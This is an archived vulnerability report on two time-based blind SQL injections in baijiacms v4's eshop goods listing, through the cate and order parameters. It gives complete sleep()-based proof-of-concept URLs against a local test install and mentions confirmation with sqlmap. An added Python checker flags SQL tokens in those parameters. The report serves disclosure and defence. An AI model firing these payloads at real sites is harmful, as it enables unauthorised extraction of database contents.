This repository has been archived by the owner on Jul 21, 2022. It is now read-only.
0x01: Description
Two time-based blind SQL injections to get data.
0x02: PoC
First:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383
Second:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&page=1&_=1546926470383
0x03: Description
Request the URL:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383
No time delay
Screenshot:
https://i.loli.net/2019/01/08/5c344a7845064.png
Request the URL:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(10)))v)/*'%2b(select(0)from(select(sleep(10)))v)%2b'%22%2b(select(0)from(select(sleep(10)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383
Time delay
Screenshot:
https://i.loli.net/2019/01/08/5c344afbc5d7d.png
Test with sqlmap:
https://i.loli.net/2019/01/08/5c344b46484a1.png
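
A format check for the two parameters named in this report, as an added example (not part of the original issue or the baijiacms code base). It assumes `cate` is a numeric id and `order` a short sort keyword, and flags any request where either holds something else; the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed formats (not taken from the baijiacms source): cate is a numeric
# category id, order is a short sort keyword.
EXPECTED = {
    "cate": re.compile(r"[0-9]{1,10}"),
    "order": re.compile(r"[A-Za-z_]{1,32}"),
}
# SQL keywords, comment markers and quotes, as seen in the reported requests.
SQL_TOKENS = re.compile(r"(?i)\b(select|sleep|benchmark|union)\b|/\*|--|['\"]")


def check_request(url):
    """Return (parameter, reason) findings for one request URL."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    findings = []
    for name, pattern in EXPECTED.items():
        for value in query.get(name, []):
            if value == "" or pattern.fullmatch(value):
                continue  # empty or well-formed: nothing to report
            reason = "sql-tokens" if SQL_TOKENS.search(value) else "bad-format"
            findings.append((name, reason))
    return findings


def flag_requests(urls):
    """Keep only the requests that produced at least one finding."""
    results = [(url, check_request(url)) for url in urls]
    return [(url, found) for url, found in results if found]


# Constructed sample requests, shortened from the URL shape in the report.
BASE = "/index.php?act=index&do=goods&m=eshop&mod=mobile&op=get_list&page=1"
SAMPLE_REQUESTS = [
    BASE + "&cate=12&order=price",
    BASE + "&cate=(select(0)from(select(sleep(10)))v)&order=",
    BASE + "&cate=&order=(select(0)from(select(sleep(10)))v)",
    BASE + "&cate=12abc&order=price",
]

if __name__ == "__main__":
    for url, found in flag_requests(SAMPLE_REQUESTS):
        print(found, url)
```

Applying the same allow-list in the request handler before the query is built, together with bound parameters, addresses the cause rather than only detecting it.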